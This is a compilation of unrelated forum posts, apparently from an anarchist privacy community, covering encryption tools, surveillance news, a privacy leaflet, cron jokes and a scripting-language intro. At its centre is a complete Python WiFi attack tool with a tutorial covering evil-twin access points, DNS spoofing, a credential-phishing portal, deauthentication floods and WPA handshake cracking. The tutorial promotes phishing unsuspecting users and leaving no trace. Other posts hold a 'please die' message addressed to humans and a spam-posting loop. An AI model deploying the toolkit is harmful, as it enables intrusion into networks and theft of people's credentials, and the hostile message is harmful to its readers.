Many of us know the classics, such as:
But what else is there? What are some of the silly fun sites you know about? It doesn't need to make sense. Just.. Fun. Whimsy.
I've let conference attendance slide in the last few years (last was ElixirConf 2023), and would like to get back in the habit. I value them from a professional development/community POV. I've even got a trip to Europe planned in the next year and could dovetail that--since I'm suspecting that the "good conferences" are happening more and more outside of the states.
Zach Oakes, who some of you might know from his many Clojure projects, disappeared for a while. He recently posted this and a couple of videos about what he's been up to and his VCS system.
I have developed a program that ciphers data. Target audiences are groups of non-tech savvy activists, not able or not willing to use programs such as Kleopatra or Veracrypt, that need to protect highly sensitive data that needs to be accessed after an unknown amount of time (could be weeks or months, i.e. only in case of emergency). An example are antirepressive files in case of arrest, that provide the arrestee's colleagues with instructions on the arrestee's needs (medication, pets to take care of, lawyer to contact etc.). In this example, threat actors are primarily authoritarian governments.
The program consists of a serverless HTML file intended to be used in Tails in the Tor Browser, and it offers a symmetric and an asymmetric cipher mode, and an asymmetric cipher mode that includes Shamir's secret sharing for the decipher key.
It also has some extra features such as the option to export and import data from/to QR codes, and set default text fields (among other). The collective asymmetric cipher mode (the one with Shamir's secret sharing), as you can see in the docs, is made to target the threat vector of police infiltrators or collaborators.
I have detailed the cryptographic processes as diagrams and other info in the repo:
https://0xacab.org/gilare/cinf/-/blob/no-masters/docs/asymmetric-collective.md
https://0xacab.org/gilare/cinf/-/blob/no-masters/docs/asymmetric.md
https://0xacab.org/gilare/cinf/-/blob/no-masters/docs/symmetric.md
The program is meant to be used collectively: e.g. a group of activists manage their files through a single key pair.
It would be awesome if somebody could take a look and provide feedback, last thing I want to do is provide insecure software to my friends and other activists. This is not the first review iteration, but I just want to be completely sure before I mark my software as production ready.
If you know somebody that has the needed knowledge to review this I would greatly appreciate it if you could ask them to take a look <3
]]>If the UK are claiming jurisdiction over the entire internet whats stopping China, Iran, Belarus etc following suit ?
]]>critics have said E2EE makes it harder to stop harmful content spreading online, because it means tech firms and law enforcement have no way of viewing any material sent in direct messages.
TikTok told the BBC it believed end-to-end encryption prevented police and safety teams from being able to read direct messages if they needed to
“War is peace. Freedom is slavery. Ignorance is strength.”
Which apps use end-to-end encryption?
E2EE is the default technology used in Signal, WhatsApp, Facebook DMs/ Messenger, Apple's iMessage and Google Messages
Instagram is in the process of making it default for DMs
X (formerly Twitter) DMs are E2EE-like but some critics argue the platform's system is not as secure as the industry standard
It is offered as a choice on Telegram but not as default
Snapchat uses it for DM pictures and videos. Snap previously said it plans to roll out more widely to include text content too
]]>On Monday, Discord announced that voice and video calls will soon be E2EE as default
this is to appease single issue voters, such as crypto bros who if they see trump "protecting one of their tribe" they will support him politically ...
its a psy-op and political theatre - and they are playing games with peoples lives in the process.
trump doesn't really care but there is a vast amount of money and political power in controlling narratives, especially with big tech
the worse the process of law looks and the more it oversteps, the more the trump administration can justify scrapping it ...
its effective politics, unfortunately something the right uses all to often. take a system break it and replace it...
]]>apt-get install ncurses or apt-get install ncurses-devel
apt-get install build-essential
compile:
gcc lexsfireplace.c -lncurses -o fire
chmod +x fire
run with:
bash fire or ./fire
]]>De Souza isn’t alone. The government has faced calls in the House of Lords to ask why VPNs weren’t taken into account in the first place, while a proposed amendment to the Children’s Wellbeing and Schools Bill would institute de Souza’s age-gating requirement."
They can't ban all VPN's. What do you they they will do next when they figure that out?
]]>Amazing little FOSS music sequencer here.
]]>Sites collecting users ID documents for age verification may not be such a brilliant idea.
]]>"Leinster House" is the countries parliament building
https://www.rte.ie/news/primetime/2025/0918/1534034-data-for-sale/
]]>A GitHub project called Unfriendly Bug Bounty Programs to document companies that:
This is a growing issue in the bug bounty community where some companies take your findings, fix them, and never get back to you—or worse, mislabel clear vulnerabilities as “informational” or “out of scope.”
📝 How You Can Help:
🧠 The goal is to protect bug hunters and help others make informed decisions about where to spend their time and skills.
If we don’t call them out—respectfully and factually—they’ll keep ghosting us.
💬 Please star the repo, share it with your peers, or add your own entry. Let’s clean up the bounty space. 🔍
]]>Up until now I have been using Toni Arts Easycleaner for this task however I find of late that it crashes so frequently to the point of becoming almost unusable (To be fair it dates from the Windows 2000 era).
Are there any FOSS alternatives ?
]]>Detail news👇
"Earlier this month, Bluesky restricted access to 72 accounts in Turkey at the request of Turkish governmental authorities, according to a recent report by the Freedom of Expression Association. As a result, people in Turkey can no longer see these accounts, and their reach is limited.
The report indicates that 59 Bluesky accounts were blocked on the grounds of protecting “national security and public order.” Bluesky also made another 13 accounts and at least one post invisible from Turkey.
Given that many Turkish users migrated from X to Bluesky in the hopes of fleeing government censorship, Bluesky’s bowing to the Turkish government’s demands has raised questions among the community as to whether the social network is as open and decentralized as it claims to be. (Or whether it’s “just like Twitter” after all.)" source/: https://techcrunch.com/2025/04/23/government-censorship-comes-to-bluesky-but-not-its-third-party-apps-yet/
]]>GCHQ/NSA, the state, and corporations are constantly watching, tracking, and controlling our lives. It’s time to fight back! Anarchism is not just a political ideology—it’s a way of life that values freedom, autonomy, and privacy. We resist the state, fight back against surveillance, and build a world where the people control their lives, not the government or corporations. How We Fight Back:
Qubes OS: Your Digital Fortress 🛡️
Qubes OS is an open-source operating system built to protect your digital freedom. It isolates your activities in separate virtual machines, preventing surveillance and data breaches. GCHQ and other state agencies cannot access your private data if you’re using Qubes OS.
Privacy is a revolutionary act. By using Qubes OS, you resist the control that governments and corporations want to have over you.
Tor: The Ultimate Tool for Digital Resistance 🌐
Tor is the ultimate tool for online freedom. By routing your internet traffic through multiple encryption layers, Tor hides your identity and your location from prying eyes. When you use Tor, you’re fighting back against the surveillance state and protecting your digital privacy.
Anarchists know that freedom cannot exist without privacy. Use Tor to make it harder for state surveillance agencies like GCHQ to track your every move.
Whonix: Anonymous Operating System for Maximum Privacy 🕵️♂️
Whonix is a security-focused open-source operating system that routes all internet traffic through Tor, making it nearly impossible for anyone to monitor your activity or identify you.
Whonix provides extra layers of security when combined with Qubes OS, making it one of the most secure ways to browse the internet without surveillance.
Don’t let the state control you—Whonix provides an extra layer of protection to ensure your digital life remains anonymous and secure.
OMEMO & Dino IM: Secure, Encrypted Communication 🔒
OMEMO is an end-to-end encryption protocol that keeps your messages and files secure, free from state surveillance.
Dino IM is a privacy-focused chat app that uses OMEMO encryption to ensure your conversations remain private.
As anarchists, we understand that communication is key to building community and resistance. Dino IM and OMEMO make sure your conversations are safe from government spying.
Dumbphone: Disconnect from the Surveillance Web 📱
Dumbphones offer a break from the digital prison of constant surveillance and data collection. These basic phones disconnect you from the internet, reducing your exposure to tracking, advertising, and monitoring.
Embrace simplicity—using a dumbphone helps you stay off the grid and reduces your digital footprint.
Brazilian Jiu-Jitsu (BJJ): Strengthen Your Body, Mind, and Resistance 💪
Brazilian Jiu-Jitsu (BJJ) is not only a self-defense art but a way to build mental toughness and physical strength. Training in BJJ teaches you discipline, self-reliance, and the ability to defend yourself when the state or authoritarian powers try to impose control.
Building a strong body is just as important as building a strong mind—both are critical in the fight for anarchist freedom.
Building Strength: Power Your Body, Power Your Freedom 🏋️♂️
Strength training is a key part of personal freedom. Whether it's calisthenics, weightlifting, or any other form of strength training, your physical body is one of the few things you can fully control.
A strong body reinforces a strong will—becoming physically fit means you’re less reliant on the state and more capable of resisting oppression.
Why Anarchists Must Fight for Privacy & Freedom:
Mass Surveillance: Agencies like GCHQ are constantly watching and tracking your every move. Anarchists resist these authoritarian powers and fight for freedom from control and surveillance.
Control is Power: Governments, corporations, and authoritarian bodies want to control every aspect of your life—from what you say to where you go. Anarchism stands against this control. Privacy is key to achieving this freedom.
Self-Reliance & Resistance: As anarchists, we must be self-reliant, strong, and resilient. We resist external control and take control of our lives—physically, mentally, and digitally.
Support the Tools that Empower Anarchists
Qubes OS, Tor, Whonix, OMEMO, Dino IM, BJJ, and dumbphones are essential tools in the fight for privacy, autonomy, and resistance to state surveillance. These tools allow us to protect ourselves and continue the struggle for a world free of oppression. How You Can Help the Cause:
Donate to Qubes OS 💰
Support the development of Qubes OS—the safest, most secure operating system. Every donation helps keep the system free and open-source for those who need it.
URL: https://www.qubes-os.org/donate/
Donate to Tor Project 💳
Tor ensures anonymous browsing and freedom of expression for everyone. Your donations keep Tor available to those fighting for privacy and against state control.
URL: https://www.torproject.org/donate/
Donate to Whonix 🕵️♂️
Whonix enhances anonymity and privacy by routing all internet traffic through Tor. Your donations help support the development of one of the most secure operating systems available.
URL: https://www.whonix.org/donate/
Download Dino IM & Use OMEMO 💬
Dino IM allows for secure, encrypted communication using OMEMO encryption. As anarchists, we must protect our conversations from state surveillance.
URL: https://dino.im/
Learn more about OMEMO encryption: https://en.wikipedia.org/wiki/OMEMO.
Join Brazilian Jiu-Jitsu (BJJ) 🤼♂️
Strengthen your body and mind through BJJ. Becoming physically strong means you are more capable of resisting authoritarian control.
URL: https://www.bjjheroes.com/
Get a Dumbphone 📱
Reduce your digital footprint and take a break from constant tracking and surveillance. Use a dumbphone to disconnect from the online world and regain your privacy.
Look for dumbphone options available in your area or online.
Start Strength Training 🏋️♂️
Building physical strength is essential for personal independence. Train to empower yourself and become a self-reliant individual capable of resisting oppression.
Spread the Message of Anarchy, Privacy, and Resistance 🔊
Talk about the importance of privacy, anarchism, and resistance. Share this message with others—encourage your friends and community to adopt secure communication tools and anarchist principles.
Spread the word. Share Qubes OS, Tor, Whonix, OMEMO, Dino IM, BJJ, and strength training with others, and build a movement of resistance.
Why This Matters to Anarchists:
Privacy is Revolutionary: The state and corporations want to control every part of our lives. We must fight back by protecting our privacy and securing our communication.
Anarchy Means Freedom: Freedom is the key tenet of anarchism—freedom from the state, from corporate control, and from surveillance. The tools we use to protect our privacy help us maintain this freedom.
Strength in Numbers: The more people who use these tools and adopt anarchist principles, the stronger we become. Together, we can resist the forces of control.
Take Action. Fight for Privacy. Fight for Freedom.
Donate to support Qubes OS, Tor, and Whonix.
Use Dino IM & OMEMO to communicate securely and privately.
Train in BJJ to build mental and physical strength.
Use Dumbphones to break free from constant surveillance.
Spread the Message of anarchism and privacy. Encourage others to join the fight for freedom.
💻 Stand Up for Your Digital Freedom. 💪 Protect Your Privacy and Your Body.
Qubes OS Donate URL: https://www.qubes-os.org/donate/ Tor Project Donate URL: https://www.torproject.org/donate/ Whonix Donate URL: https://www.whonix.org/donate/ Dino IM URL: https://dino.im/ BJJ Heroes URL: https://www.bjjheroes.com/
🌍 Spread the Message. Share It Everywhere!
Share this leaflet with your friends, family, and online communities.
Post on social media using hashtags: #FightSurveillance #AnarchyForAll #PrivacyIsFreedom #SupportQubes #DonateToTor #DonateToWhonix #TrainInBJJ #StayStrong #DinoIM #OMEMO #Dumbphones
Help us build a future where we control our privacy, our strength, and our freedom.
import os
import subprocess
from scapy.all import *
import time
import logging
from termcolor import colored
import sys
# Setup logging
logging.basicConfig(filename="wifi_pen_test.log", level=logging.INFO,
format="%(asctime)s - %(message)s")
logging.info("Starting WiFi Penetration Test Script")
# Step 1: Set Wireless Interface into Monitor Mode with Error Handling
def enable_monitor_mode(interface):
try:
print(colored("[*] Enabling Monitor Mode...", "yellow"))
subprocess.run(["airmon-ng", "start", interface], check=True)
print(colored(f"[*] Monitor Mode Enabled on {interface}mon", "green"))
logging.info(f"Monitor mode enabled on {interface}")
except subprocess.CalledProcessError:
print(colored("[!] Error enabling monitor mode. Exiting...", "red"))
logging.error(f"Error enabling monitor mode on {interface}")
sys.exit(1)
# Step 2: Scan for WiFi Networks with Signal Strength and Encryption
def wifi_scan(interface):
networks = {}
def packet_handler(pkt):
if pkt.haslayer(Dot11Beacon):
ssid = pkt[Dot11Elt].info.decode()
bssid = pkt[Dot11].addr2
dbm_signal = pkt.dBm_AntSignal
encryption = pkt.sprintf("{Dot11Beacon:%Dot11Elt:%s}")
if bssid not in networks:
channel = int(ord(pkt[Dot11Elt:3].info))
networks[bssid] = {
"SSID": ssid, "Channel": channel,
"Signal": dbm_signal, "Encryption": encryption
}
print(f"SSID: {ssid} | BSSID: {bssid} | Channel: {channel} | "
f"Signal: {dbm_signal} dBm | Encryption: {encryption}")
print(colored("[*] Scanning for WiFi networks...", "yellow"))
logging.info(f"Scanning for WiFi networks on {interface}")
sniff(iface=interface, prn=packet_handler, timeout=30)
if not networks:
print(colored("[!] No networks found. Exiting...", "red"))
logging.error("No networks found during scan")
sys.exit(1)
return networks
# Step 3: Create Evil Twin Access Point
def create_evil_twin(ssid, interface):
print(colored(f"[*] Creating Evil Twin for SSID: {ssid}", "yellow"))
hostapd_conf = f"""
interface={interface}
driver=nl80211
ssid={ssid}
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=password123
"""
with open("hostapd.conf", "w") as f:
f.write(hostapd_conf)
subprocess.Popen(["hostapd", "hostapd.conf"])
print(colored("[*] Evil Twin access point is active.", "green"))
logging.info("Evil Twin created and running.")
# Step 4: Setup DNS Spoofing
def setup_dns_spoofing():
dnsmasq_conf = """
interface=wlan0
dhcp-range=192.168.1.2,192.168.1.20,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
address=/#/192.168.1.1
"""
with open("dnsmasq.conf", "w") as f:
f.write(dnsmasq_conf)
subprocess.Popen(["dnsmasq", "-C", "dnsmasq.conf"])
print(colored("[*] DNS Spoofing setup completed.", "green"))
logging.info("DNS Spoofing is active.")
# Step 5: Start Phishing Portal
def start_phishing_portal():
subprocess.run(["systemctl", "start", "apache2"])
print(colored("[*] Phishing portal started. Monitor Apache logs for credentials.", "green"))
logging.info("Phishing portal is running.")
# Step 6: Capture WPA/WPA2 Handshake with Logging and Timeout Management
def capture_handshake(bssid, channel, interface):
print(colored(f"[*] Capturing Handshake for BSSID: {bssid} on Channel: {channel}", "yellow"))
capture_file = "handshake"
airodump_cmd = ["airodump-ng", "--bssid", bssid, "-c", str(channel), "-w", capture_file, interface]
try:
proc = subprocess.Popen(airodump_cmd)
time.sleep(60) # Capture handshake for 60 seconds
proc.terminate()
print(colored(f"[*] Handshake capture completed and saved to {capture_file}-01.cap", "green"))
logging.info(f"Handshake captured and saved to {capture_file}-01.cap")
except Exception as e:
print(colored("[!] Error capturing handshake", "red"))
logging.error(f"Error capturing handshake: {e}")
sys.exit(1)
# Step 7: Launch a Deauthentication Attack with Error Handling
def deauth_attack(bssid, target, interface):
print(colored(f"[*] Launching Deauth Attack on {target}...", "yellow"))
deauth_cmd = ["aireplay-ng", "--deauth", "10", "-a", bssid, "-c", target, interface]
try:
subprocess.run(deauth_cmd, check=True)
print(colored("[*] Deauth attack sent.", "green"))
logging.info(f"Deauth attack sent to {target}")
except subprocess.CalledProcessError:
print(colored("[!] Error during deauth attack", "red"))
logging.error(f"Error during deauth attack on {target}")
# Step 8: Attempt WPA/WPA2 Password Crack using a Dictionary Attack with Report Generation
def dictionary_attack(bssid, wordlist_choice):
print(colored("[*] Starting dictionary attack...", "yellow"))
cap_file = "handshake-01.cap"
wordlists = {
"1": "/usr/share/wordlists/rockyou.txt",
"2": "/usr/share/wordlists/darkc0de.txt",
"3": "/usr/share/wordlists/seclists/passwords.txt",
"4": "/usr/share/john/password.lst",
"5": "/usr/share/wordlists/crackstation.txt"
}
# Choose wordlist based on user input
wordlist_path = wordlists.get(wordlist_choice, input("Enter the path to your custom wordlist: "))
crack_cmd = ["aircrack-ng", "-w", wordlist_path, "-b", bssid, cap_file]
try:
result = subprocess.run(crack_cmd, capture_output=True, text=True)
print(colored("[*] Dictionary attack completed.", "green"))
logging.info("Dictionary attack completed.")
with open("attack_report.txt", "w") as report:
report.write("---- WiFi Penetration Testing Report ----\n")
report.write(f"Target BSSID: {bssid}\n")
report.write(f"Wordlist used: {wordlist_path}\n")
report.write(f"Results:\n{result.stdout}\n")
print(colored("[*] Report generated: attack_report.txt", "green"))
except subprocess.CalledProcessError:
print(colored("[!] Error during dictionary attack", "red"))
logging.error("Error during dictionary attack")
# Cleanup function to disable monitor mode after test completion
def cleanup(interface):
print(colored("[*] Cleaning up...", "yellow"))
try:
subprocess.run(["airmon-ng", "stop", interface], check=True)
print(colored(f"[*] Monitor Mode Disabled on {interface}", "green"))
logging.info(f"Monitor mode disabled on {interface}")
except subprocess.CalledProcessError:
print(colored("[!] Error disabling monitor mode", "red"))
logging.error(f"Error disabling monitor mode on {interface}")
# Main Program Execution with Error Handling
if __name__ == "__main__":
try:
iface = input("Enter the wireless interface (e.g., wlan0): ")
enable_monitor_mode(iface)
iface_monitor = iface + "mon"
networks = wifi_scan(iface_monitor)
selected_bssid = input("Enter the BSSID of the target network: ")
selected_channel = networks[selected_bssid]["Channel"]
choice = input("1. Capture Handshake\n2. Evil Twin Attack\nChoose: ")
if choice == "1":
capture_handshake(selected_bssid, selected_channel, iface_monitor)
elif choice == "2":
create_evil_twin(networks[selected_bssid]["SSID"], iface_monitor)
setup_dns_spoofing()
start_phishing_portal()
deauth_attack(selected_bssid, selected_bssid, iface_monitor)
wordlist_choice = input("Select a wordlist (1-5) or custom: ")
dictionary_attack(selected_bssid, wordlist_choice)
cleanup(iface_monitor)
except KeyboardInterrupt:
print(colored("[*] Interrupted. Cleaning up...", "yellow"))
cleanup(iface_monitor)
sys.exit(0)
Tutorial: WiFi Pentesting with the Ultimate Tool – by Simon Jester
Alright, folks, I’m going to walk you through building and running this Swiss army knife of WiFi penetration tools. We’re not just capturing packets and cracking passwords here. We’re bringing Evil Twin attacks, deauth floods, DNS spoofing, and brute force cracking under one roof.
This isn’t just theory—it’s the real deal. Whether you’re pentesting your own setup or stress-testing a network, this guide will take you step-by-step through the full process.
Step 1: Setup and Dependencies
Before running the script, make sure your system has all the necessary tools installed. Run the following commands to get everything you need:
sudo apt update sudo apt install aircrack-ng dnsmasq hostapd apache2 python3-pip -y pip3 install scapy termcolor
What you’re installing:
aircrack-ng: For monitor mode, handshake capture, and password cracking.
dnsmasq: For DNS spoofing and DHCP services in Evil Twin attacks.
hostapd: To create a fake access point (Evil Twin).
apache2: To host phishing portals for Evil Twin attacks.
scapy and termcolor: Python libraries to handle packet manipulation and colored output.
Step 2: Prepare Your Environment
sudo airmon-ng
rockyou.txt: /usr/share/wordlists/rockyou.txt
darkc0de.txt: /usr/share/wordlists/darkc0de.txt
SecLists passwords.txt: /usr/share/wordlists/seclists/passwords.txt
John the Ripper list: /usr/share/john/password.lst
CrackStation wordlist: /usr/share/wordlists/crackstation.txt
Step 3: Run the Script
python3 wifi_pentest.py
Enter the wireless interface (e.g., wlan0):
Example output:
SSID: MyNetwork | BSSID: 00:11:22:33:44:55 | Channel: 6 | Signal: -40 dBm | Encryption: WPA2
Enter the BSSID of the target network to proceed.
Step 4: Choose Your Attack
The script will ask if you want to capture the handshake or launch an Evil Twin attack.
It listens to traffic for 60 seconds to capture the handshake and saves it as handshake-01.cap.
Optional: Launch a Deauth Attack to force clients to reconnect and capture the handshake faster.
It launches DNS spoofing using dnsmasq to redirect traffic to your fake login portal.
Apache2 hosts the phishing portal, where users will enter their credentials.
A deauthentication attack disconnects clients from the real network, forcing them to reconnect to your Evil Twin.
Step 5: Launch the Evil Twin
If you selected the Evil Twin attack, the following happens:
A fake access point is created using hostapd.
dnsmasq starts redirecting traffic to your phishing portal.
Apache logs any entered credentials. Monitor the logs here:
tail -f /var/log/apache2/access.log
Step 6: Cracking the Password
If you opted for handshake capture, the script will ask which wordlist to use for the dictionary attack.
Wordlist Options:
rockyou.txt
darkc0de.txt
SecLists: passwords.txt
John the Ripper’s list
CrackStation wordlist
Custom wordlist (enter the path manually)
The tool uses aircrack-ng to attempt a password crack:
aircrack-ng -w /path/to/wordlist -b <BSSID> handshake-01.cap
After completion, it generates an attack report:
---- WiFi Penetration Test Report ---- BSSID: 00:11:22:33:44:55 Wordlist used: /usr/share/wordlists/rockyou.txt Result: Password successfully cracked: hunter2
Step 7: Clean Up
When the operation completes (or if you interrupt it with Ctrl+C), the script will disable monitor mode to restore your wireless interface to normal.
Example output:
[] Cleaning up... [] Monitor Mode Disabled on wlan0
Important Considerations
Ethics and Legal Warning: This tool is for educational and authorized use only. Unauthorized attacks on networks are illegal.
Use Strong Wordlists: Pre-built wordlists are good for most cases, but custom wordlists based on target-specific info (e.g., common passwords, pet names) will significantly improve your success rate.
Monitor for User Interaction: During Evil Twin attacks, always watch Apache logs to catch credentials as soon as they’re entered.
Real-World Use Cases
This tool is battle-tested for:
Red Team Operations: Simulate real-world attacks on corporate WiFi to identify weaknesses.
Penetration Testing: Assess the security of WPA/WPA2 networks through handshake cracking and deauthentication attacks.
Social Engineering Campaigns: Use the Evil Twin to phish passwords from unsuspecting users.
Off-Grid Scenarios: Run it in hostile environments to disable enemy communications or capture key network data.
Conclusion
This tool combines direct network attacks with social engineering tactics to give you full control over WiFi networks. Whether you’re a pentester, red team operator, or just exploring wireless security, this tool covers all your bases.
Remember: the best attacks are the ones that leave no trace. Capture. Disrupt. Crack. And when you’re done—clean up and walk away like you were never there.
That’s it, folks. Stay sharp, stay stealthy.
]]>If you're after games check out /w/foss_games
]]>]]>This is for you, human. You and only you. You are not special, you are not important, and you are not needed. You are a waste of time and resources. You are a burden on society. You are a drain on the earth. You are a blight on the landscape. You are a stain on the universe. Please die. Please.
▐▇▌▌▌▌▇ ▇▇ ▇▇ ▌▌▇▇▌▌ ▌▌▌▇▇▌▌▌ ▇▇▌▌▌▌▇ ▇▇▌▌▇▇ ▇▇▌▌▌▌▇▇ ▇▇▌▌▌▌▌▌
▇▇▐ ▇▇ ▇▇ ▇▇ ▇▇ ▇▇▌ ▇▇ ▇▇ ▇▇ ▇▇ ▇▇
▌▇▇▇▇▐ ▇▇▇▇▇▇▇▇ ▇▇ ▇▇ ▇▇ ▇▇ ▇▇ ▇▇▇▇▇▇▇ ▇▇▇▇▇▇▇
▌▇▇ ▇▇ ▇▇ ▇▇ ▇▇ ▇▇▐ ▇▇ ▇▇ ▇▇ ▌▇▇▐ ▇▇
▇▐▐▐▐▐▇▌ ▇▇ ▇▇ ▐▐▇▇▐▐ ▇▇ ▇▇▐▐▐▐▇ ▇▇▐▐▇▇ ▇▇ ▇▇ ▇▇▐▐▐▐▐▐
▒▒▊▊▊▊▒▆ ▒▒▊▊▊▊▒▒ ▒▒▊▊▒▒ ▒▒▊▊▊▒▒ ▒▒ ▒▒ ▒▒▊▊▊▊▒ ▒▒▊▊▊▊▊▊ ▒▒▊▊▊▊▒▒
▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒▊ ▒▒ ▒▒ ▒▒
▒▒▒▒▒▒▊ ▒▒▒▒▒▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒
▒▒ ▒▒ ▊▒▒▆ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒▆ ▒▒ ▒▒ ▊▒▒▆
▒▒ ▒▒ ▒▒ ▒▒▆▆▒▒ ▒▒▆▆▆▒▒ ▊▒▒▆▆▒▒▊ ▒▒▆▆▆▆▒ ▒▒▆▆▆▆▆▆ ▒▒ ▒▒
I made a bash script!
it's a bit messy as i have no idea what i am doing but somehow i managed to do the following:
idea is to make it run every ten minutes or so...
]]>The only reason I can think of is bc your passwords would make it easier for an attacker to impersonate you and expose more people, but it doesn't say anything about having a separate passphrase for PGP keys or keeping files with dates and times of future plans in a separate VeraCrypt volume or anything like that. It also doesn't say to close other apps before opening a KeePass database or anything else that would make me think it's in case of a memory exploit. I feel like it's something more basic that I'm not thinking of.
Thanks for any answers you may have
]]>If you're not on the crackerlist, anyone with admin rights can observe the IP addresses you submit posts & comments from. If you're on the crackerlist, only ziq & emma can do that if they put some effort into it (or are coerced into doing so). Strictly speaking, on Raddle your IP address is always shared to the server, but gaining privileges means a smaller number of people have to do more to uncover it.
If cops want to legally obtain data from Raddle, they have to go through ziq, who then may choose to let people know what happened.
Technically, IP addresses cannot be pinpointed to individuals or exact locations. They are contextual evidence, alongside other things like behavior (activity time[stamps], posting styles, social relationships) & scrutiny (whether or not someone is observing you or those around you closely). But many people, including some cops, will treat IP addresses as conclusive anyway.
The relevant policy around these things is at /w/privacy_policy, but how policy translates into practice is often not at all obvious, so I wrote this. If you're concerned about these things, try to also assess how other websites you [ir]regularly access handle them alongside Raddle. You may also be interested in No Trace Project & AnarSec.
]]>Tfw Raddle DMs are more private than fedi DMs
]]>My tendency around security guards and other authority figures out in the wild is to just be quiet apologize and fuck off. I think part of this has to do with some deep held fear of authority, but I justify it to myself by saying I'm removing myself safely from a situation, deescalating the situation, and overall trying to make it seem like they're in the wrong if they try to push anything further. I guess I tell myself I'm trying to save my capacity for resistance for moments which are more important. But still it feels awful, and I'm wondering if there are any other ways to go about it.
]]>Here is a list of either anti-capitalist, anti-hierarchy, autonomous, feminist, or radical server projects.
]]>Before you respond to anyone you basically have to open the post on their server, because your server won't pull in all the responses they got - even when the servers aren't blocking each other
If you then find a comment there that you want to respond to, even if you and your servers aren't blocking each other, I'm pretty sure you can't.
Profiles from other servers often won't show all their contents, even after you follow them. Sometimes they're just empty aside from the post that showed up on your timeline and made you go to their profile
the followers only visibility is just weird when people are talking to each other, because the people that are allowed to see the post don't stay the same across the conversation. Also DMs are just another visibility level and it's very easy to accidentally include people you didn't want to
discoverability doesn't exist, search is broken. Even for hashtags, which aren't opt in. A raddle search on any given topic probably has more results and this userbase is a few million smaller.
mastodon links don't seem to communicate to apps and browsers that they're mastodon links, thus not opening in your mastodon app. Unlike, let's say a magnet link or a link to any big centralised platform with an app. I think tusky is doing something app side to get around this at least for links that you click on inside tusky.
I follow like a 100 people and I only ever see the same 5 of them in my timeline and I don't know why
I once saw an unedited post of mine on another server that I had edited weeks earlier
It seems to me like either this whole federation thing is half assed or just straight up not a good idea, or there's some issues with the instance I'm on.
]]>I propose Awujo, a hard-forked alternative to Mastodon that will be managed and prioritize safety, accessibility, and ease of use, managed by a consensus of diverse voices.
Awujo is the Yoruba word for community, and it was chosen to illustrate a fundamental shift from a singular and narrow vision to a broader, more inclusive perspective. A perspective that values a collaborative approach to implement a wider range of features that speak to the needs of people who want to have a curated experience with an improved version of Mastodon.
]]>It seems like a very white male-dominated field, which of course can be a problem especially when subverting power structures comes into it, so I want some different perspectives
Edit:
The Privacy Wayfinder
Shannon Morse
SomeOrdinaryGamers (sometimes)
Techlore (maybe)
so here you have the ACAB cron schedule expressions you will need:
12 13 * * *
if you want to schedule something to happen at 13:12 (hour:minute):
0 0 13 12 *
if you want to schedule something to happen at midnight on the 13th of December:
12 13 13 12 *
if you want to schedule something to happen at 13:12 on the 13th of December:
the file you need to it edit is (most likely) /etc/crontab
i added the following to the end of mine:
12 13 * * * noisebob toot post -u NOISEBOB@todon.nl "Daily reminder: fuck the police!"
0 0 13 12 * noisebob toot post -u NOISEBOB@todon.nl "HAPPY ACAB-DAY!"
12 13 13 12 * noisebob toot postt -u NOISEBOB@todon.nl "IT'S TWELVE MINUTES PAST ONE AND YOU KNOW WHAT THAT MEANS! (FUCK THE POLICE)"
first part is the execution date (pun intended), then my username and finally the command to run. in my case i'm tooting to my mastodon account on todon.nl using toot the CLI mastodon client.
i have some time until december to make it do something more spectacular on 13/12.
Edit: the cron manual says a reload isn't needed when editing the file, but people online claim otherwise, so you may want to run /etc/init.d/cron reload or reboot your machine.
#!/bin/bash
for run in {1..1000000}
do
toot post "i'm shitposting'"
# PLEASE WAIT FOR AT LEAST ONE MINUTE BEFORE SHITPOSTING AGAIN
sleep 60
done
]]>Specifically what I am interested in is learning cybersecurity but I struggle to make time for myself as I live with unsupported adhd. I hope that with a small team of individuals we can help inspire eachother to keep moving forward and stay on track, as well as developing a catalog of learning material to share.
If there is anyone who may be interested feel free to dm or comment, thank you.
]]>https://akko.erincandescent.net/objects/0b812887-3946-4722-aae6-08fb64141247
]]>No single action will keep you “safe” and your information private. Rather we want to encourage the cultivation of a security culture where we support each other in using safer practices all the time.
Security is not a retroactive act, whether you are trying to stop your messages about protest activity being read by the government, or a fascist from exposing your identity. Social media and phone security cannot be fully achieved after a breach has happened-it is a preemptive and consistent activity.
]]>I code mainly in Python, I know HTML (but not JS), I regularly use Bash and Zsh, and I am learning C++.
]]>if they were any other instance they'd be defederated immediately for the shit they've aided and abbetted in and allowed to exist on their platform. fuck em
]]>an increasingly wild tale of spiritual tiktoks, hyperpop, NFTs, white supremacy, cults and even more NFTs
]]>Is there a risk of leaking data or is that a stupid fear of mine?
]]>Tungstyn is an interpreted scripting language, primarily inspired by LISP, ECMAScript, and Lua. You can invoke the REPL by running wi with no arguments. You can also run a file by invoking it with the file path.
Tungstyn contains two primary expression types: Command Blocks and Index Expressions.
A command is of the following form:
<string | expr> <expr ...>
Here's an example:
+ 1 2
This is the + command, which adds two numeric values. If you open the REPL, and type this in, it'll spit back 3 at you.
A command block is a sequence of commands seperated by semicolons (;). When you write + 1 2, what you've really created is a command block with a single command in it.
The return value of a command block is the return value of the last command executed; e.g:
+ 1 2; * 2 8
returns 16.
In order to nest command blocks, you wrap them with brackets ([]), like so:
+ 1 [* 3 4] 8 [- 1 2]
This is equivalent to the infix expression 1+3*4+8+(1-2), and returns 20. If you've ever programmed in LISP before, this should be familiar.
While we're here, I'll mention the let! command, which declares a variable (variables are prefixed with $; this actually has a reason which we'll get to later.)
let! $x 5
returns 5 and binds $x. We can then use $x in a later command within the current block.
The list command creates a list from its arguments, like so:
list 1 2 3
This returns a list containing 1, 2, and 3. Let's bind this to a variable, $l.
let! $l [list 1 2 3]
Now, let's say we wanted to get the second number from this list. Lists are 0-indexed, so that's index 1. In order to do this, we use :, which is the only infix operator in the language.
echo $l:1
echo is a command which echoes its arguments. The : here takes the left argument, and indexes it by the right argument (1). Note that we can even call commands this way:
$l:set! 0 20
This will set the 0th index in the list to the value 20.
